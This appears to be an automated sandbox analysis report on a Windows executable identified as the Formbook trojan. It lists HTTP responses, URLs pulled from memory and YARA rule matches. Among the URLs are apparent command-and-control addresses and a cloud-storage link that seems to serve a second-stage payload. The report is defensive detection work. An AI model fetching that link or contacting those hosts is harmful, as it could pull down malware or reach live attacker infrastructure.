        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:20:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:20:33 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:20:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:22:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:22:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:22:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:22:35 GMT Content-Type: text/html Content-Length: 571 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:22:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:22:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:22:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:22:48 GMT Content-Type: text/html Content-Length: 2814 Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: "afe-6014d9a904f4f"
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:23:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: 2cc_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://brongal.by/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache content-encoding: gzip vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:23:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: 2cc_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://brongal.by/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache content-encoding: gzip vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:23:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: 2cc_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://brongal.by/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache content-encoding: gzip vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
        Source: secinit.exe, 0000000A.00000002.83835201510.0000000004608000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.00000000047A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F
        Source: secinit.exe, 0000000A.00000002.83835201510.00000000042E4000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000004484000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: fJuwM4Bwi7.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: fJuwM4Bwi7.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: secinit.exe, 0000000A.00000002.83836936890.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83835201510.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000003986000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: secinit.exe, 0000000A.00000002.83835201510.000000000479A000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.000000000493A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.insist.site/
        Source: SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83832835974.00000000014AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shun-yamagata.com
        Source: SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83832835974.00000000014AB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shun-yamagata.com/8cwt/
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000263E000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000263E000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79182507617.0000000002800000.00000004.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000266B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download/
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=downloadQ
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: secinit.exe, 0000000A.00000002.83830820007.000000000010B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
        Source: secinit.exe, 0000000A.00000002.83830820007.000000000010B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.lihttps://login.li0
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83832065091.00000000027C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: secinit.exe, 0000000A.00000003.79359194925.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: secinit.exe, 0000000A.00000002.83836936890.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83835201510.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000003986000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknown HTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49842 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 172.217.215.132:443 -> 192.168.11.30:49843 version: TLS 1.2
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 5_2_0040515D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040515D

        E-Banking Fraud

        Source: Yara match File source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_329534E0 NtCreateMutant,LdrInitializeThunk,8_2_329534E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952B90 NtFreeVirtualMemory,LdrInitializeThunk,8_2_32952B90
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32954260 NtSetContextThread,8_2_32954260
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32954570 NtSuspendThread,8_2_32954570
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952A80 NtClose,8_2_32952A80
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952AA0 NtQueryInformationFile,8_2_32952AA0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952AC0 NtEnumerateValueKey,8_2_32952AC0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952A10 NtWriteFile,8_2_32952A10
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952B80 NtCreateKey,8_2_32952B80
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952BC0 NtQueryInformationToken,8_2_32952BC0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952BE0 NtQueryVirtualMemory,8_2_32952BE0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952B10 NtAllocateVirtualMemory,8_2_32952B10
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952B00 NtQueryValueKey,8_2_32952B00
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_32952B20 NtQueryInformationProcess,8_2_32952B20
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 8_2_329538D0 NtGetContextThread,8_2_329538D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe Code function: 5_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_00403217
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: String function: 3290B910 appears 136 times
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: String function: 32967BE4 appears 56 times
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: String function: 3299EF10 appears 57 times
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: String function: 3298E692 appears 49 times
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032BB0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesecinitj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesecinitj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032866000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000003.79082655954.00000000326AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs fJuwM4Bwi7.exe
        Source: fJuwM4Bwi7.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
